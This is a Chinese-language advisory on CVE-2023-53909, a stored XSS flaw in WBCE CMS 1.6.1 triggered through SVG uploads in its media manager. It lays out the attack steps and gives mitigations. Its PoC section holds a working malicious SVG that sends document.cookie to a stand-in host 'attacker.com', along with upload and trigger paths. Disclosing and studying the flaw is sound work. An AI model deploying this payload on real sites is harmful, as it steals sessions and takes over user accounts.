CVE-2023-53909 WBCE CMS SVG文件上传存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2023-53909

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

WBCE CMS

漏洞概述

CVE-2023-53909是WBCE CMS 1.6.1版本中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由于应用程序在处理SVG文件上传时缺乏充分的输入验证和内容过滤所导致。攻击者可以利用媒体管理器的文件上传功能，上传包含恶意JavaScript代码的SVG文件到服务器。当其他用户访问或浏览这些被上传的SVG文件时，嵌入其中的恶意脚本将在受害者浏览器上下文中执行，从而窃取会话Cookie、劫持用户账户、进行钓鱼攻击或执行其他恶意操作。由于该漏洞为存储型，恶意代码会永久保存在服务器上，所有访问该文件的用户都会受到攻击影响。此漏洞需要攻击者具有低权限的认证账户即可实施攻击，且需要用户交互才能触发，具有较高的隐蔽性和危害性。

技术细节

该漏洞存在于WBCE CMS的文件上传处理模块中，具体位于/wbce/modules/elfinder/ef/php/connector.wbce.php端点。漏洞的根本原因在于应用程序对上传的SVG文件内容缺乏严格的安全检查。SVG（可缩放矢量图形）是一种基于XML的矢量图形格式，支持内嵌JavaScript代码。当应用程序允许上传SVG文件但未对文件内容进行净化处理时，攻击者可以在SVG文件中插入<script>标签或其他事件处理器（如onload、onerror等）来执行任意JavaScript代码。攻击流程如下：首先，攻击者使用低权限账户登录CMS系统；然后通过媒体管理器上传精心构造的恶意SVG文件；上传后的SVG文件被存储在服务器可访问的目录中；当受害者访问该SVG文件URL或在管理后台浏览媒体文件时，浏览器会解析SVG并执行其中嵌入的恶意脚本。由于SVG文件通常被视为安全的多媒体资源，浏览器和Web应用防火墙可能不会拦截此类攻击，导致漏洞难以被传统安全设备检测和防御。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标网站使用WBCE CMS，并确定版本号为1.6.1

STEP 2

步骤2：账户获取

攻击者获取目标系统的低权限认证账户（如普通用户账户）

STEP 3

步骤3：恶意文件构造

攻击者构造包含恶意JavaScript代码的SVG文件，使用<script>标签或事件处理器（如onload、onerror）注入payload

STEP 4

步骤4：文件上传

攻击者通过媒体管理器访问/wbce/modules/elfinder/ef/php/connector.wbce.php端点，上传恶意SVG文件

STEP 5

步骤5：存储与触发

恶意SVG文件被存储在服务器上，当受害者访问该文件或在管理后台浏览媒体时触发XSS

STEP 6

步骤6：会话劫持

恶意脚本执行后，攻击者可以窃取受害者的会话Cookie、劫持账户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Malicious SVG file for CVE-2023-53909 -->
<!-- This PoC demonstrates the stored XSS via SVG upload -->

<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">
    // Steal session cookies
    var cookies = document.cookie;
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'https://attacker.com/steal?cookie=' + encodeURIComponent(cookies), true);
    xhr.send();
    
    // Alternative: Display alert for verification
    alert('XSS Payload Executed - CVE-2023-53909');
    console.log('Stolen cookies: ' + cookies);
  </script>
  <rect width="100" height="100" fill="red"/>
  <text x="10" y="50">Click to view</text>
</svg>

<!-- Upload this SVG file through the media manager -->
<!-- Endpoint: /wbce/modules/elfinder/ef/php/connector.wbce.php -->
<!-- Then access the uploaded file to trigger the XSS -->
<!-- Example: /wbce/media/your_uploaded_file.svg -->

影响范围

WBCE CMS 1.6.1

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1）限制或禁用SVG文件上传功能；2）对上传目录设置禁止执行权限；3）添加Content-Security-Policy响应头限制脚本执行；4）增加文件上传的内容审查机制，检测并拒绝包含<script>标签的SVG文件；5）使用Web应用防火墙规则阻断相关攻击流量。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2023-53909
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2023-53909
3 Details https://www.cvedetails.com/cve/CVE-2023-53909/
4 VulDB https://vuldb.com/cve/CVE-2023-53909
5 Link https://wbce-cms.org/
6 Link https://www.exploit-db.com/exploits/51484
7 Link https://www.vulncheck.com/advisories/wbce-cms-svg-file-content-cross-site-scripting
8 Link https://www.exploit-db.com/exploits/51484